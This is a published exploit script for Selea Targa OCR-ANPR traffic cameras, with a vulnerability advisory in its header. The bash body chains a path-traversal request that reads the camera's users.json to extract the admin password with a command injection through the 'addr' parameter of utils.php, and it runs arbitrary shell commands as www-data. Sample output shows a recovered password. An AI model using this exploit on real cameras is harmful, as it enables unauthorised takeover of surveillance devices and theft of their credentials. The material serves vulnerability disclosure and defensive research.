Selea Targa IP OCR-ANPR Camera Remote Code Execution

`#!/bin/bash  
#  
# Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution  
#  
#  
# Vendor: Selea s.r.l.  
# Product web page: https://www.selea.com  
# Affected version: Model: iZero  
# Targa 512  
# Targa 504  
# Targa Semplice  
# Targa 704 TKM  
# Targa 805  
# Targa 710 INOX  
# Targa 750  
# Targa 704 ILB  
# Firmware: BLD201113005214  
# BLD201106163745  
# BLD200304170901  
# BLD200304170514  
# BLD200303143345  
# BLD191118145435  
# BLD191021180140  
# BLD191021180140  
# CPS: 4.013(201105)  
# 3.100(200225)  
# 3.005(191206)  
# 3.005(191112)  
#  
# Summary: IP camera with optical character recognition (OCR) software for automatic  
# number plate recognition (ANPR) also equipped with ADR system that enables it to read  
# the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number  
# of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number  
# plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes  
# this camera suitable for all installation conditions. Its built-in OCR software works  
# as an automatic and independent system without the need of a computer, thus giving  
# autonomy to the device even in the event of an interruption in the connection between  
# the camera and the operations centre.  
#  
# Desc: Selea suffers from an authenticated command injection vulnerability. This can be  
# exploited to inject and execute arbitrary shell commands as the www-data user through  
# the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated  
# LFI issue an attacker can grab credentials, authenticate and execute system commands.  
#  
# =====================================================================================  
# /mnt/app/scripts/address_check.sh:  
# ----------------------------------  
#  
# 01: #!/bin/sh  
# 02: . /mnt/app/scripts/env.sh  
# 03: . /mnt/app/scripts/log.sh  
# 04:  
# 05: CMD="$1"  
# 06: ADDR="$2"  
# 07: PORT="$3"  
# 08:  
# 09: if [ "$CMD" == "ping" ]; then  
# 10: RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 )  
# 11: elif [ "$CMD" == "port" ]; then  
# 12: log "/usr/bin/nc -w 1 -v -z $ADDR $PORT"  
# 13: RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 )  
# 14: fi  
# 15:  
# 16: echo -e "$RESULT"  
#  
# =====================================================================================  
#  
# Tested on: GNU/Linux 3.10.53 (armv7l)  
# PHP/5.6.22  
# selea_httpd  
# HttpServer/0.1  
# SeleaCPSHttpServer/1.1  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2021-5620  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php  
#  
#  
# 07.11.2020  
#  
#  
  
  
# PoC chained exploit (as admin):  
#  
# solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id  
# Password found: testingus  
# Using Authorization: YWRtaW46dGVzdGluZ3VzCg==  
# Using command: id  
# uid=33(www-data) gid=33(www-data) groups=33(www-data)  
#  
#  
IP=$1  
CMD=$2  
PWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'`  
echo 'Password found: '${PWD}  
AUTH=$(echo admin:${PWD} | base64)  
echo 'Using Authorization: '${AUTH}  
echo 'Using command: '${CMD}  
curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" |grep -oP '1.3.3.7\K.*?(?=")'  
`